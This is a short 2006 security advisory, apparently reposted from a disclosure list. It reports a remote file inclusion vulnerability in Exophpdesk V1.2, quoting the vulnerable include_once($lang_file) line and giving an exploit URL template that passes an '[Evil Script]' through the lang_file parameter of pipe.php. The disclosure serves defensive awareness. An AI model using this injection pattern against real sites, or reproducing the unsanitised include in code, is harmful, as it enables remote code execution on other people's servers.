Security Advisory: Exophpdesk V1.2 - Remote File Include

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  SiteXpress SQL Injection
  SiteXpress SQL Injection
  [Full-disclosure] Advisory 14/2006: Dotdeb PHP Email Header Injection Vulnerability
  ASPintranet SQL Injection

From: firewall1954_(at)_hotmail.com <firewall1954_(at)_hotmail.com>
Date: 14.11.2006
Subject: Exophpdesk V1.2 - Remote File Include

======================================================================
# Exophpdesk V1.2 - Remote File Include by Firewall


# Application Affect:
                  Exophpdesk V1.2

# Sorce Code:
                  http://scripts.ringsworld.com/customer-support/exophpdesk-v1.2.
zip

# Code:
                  include_once($lang_file);

# ExPloit :
  http://www.site.com/Exophpdesk_PATH/pipe.php?lang_file=[Evil Script]

# Contact:
                  Firewall1954@hotmail.com

# GrEatZ :

|Her0|slackwaren|Ozzmadark|slappter|ArCaX-ATH|CiberPunk|saok|
|Cvir.System|napster|Matasanos|Zlevyn|Azrael|CyberAlexis|
|NitroNet|Matasanos|SysRoot|_ANtrAX_|FaLENcE|Mnox|Xneo.System|

"El ceviche y El pisco es peruano y jamas podran igualar su calidad"
                        "Viva el Peru"

======================================================================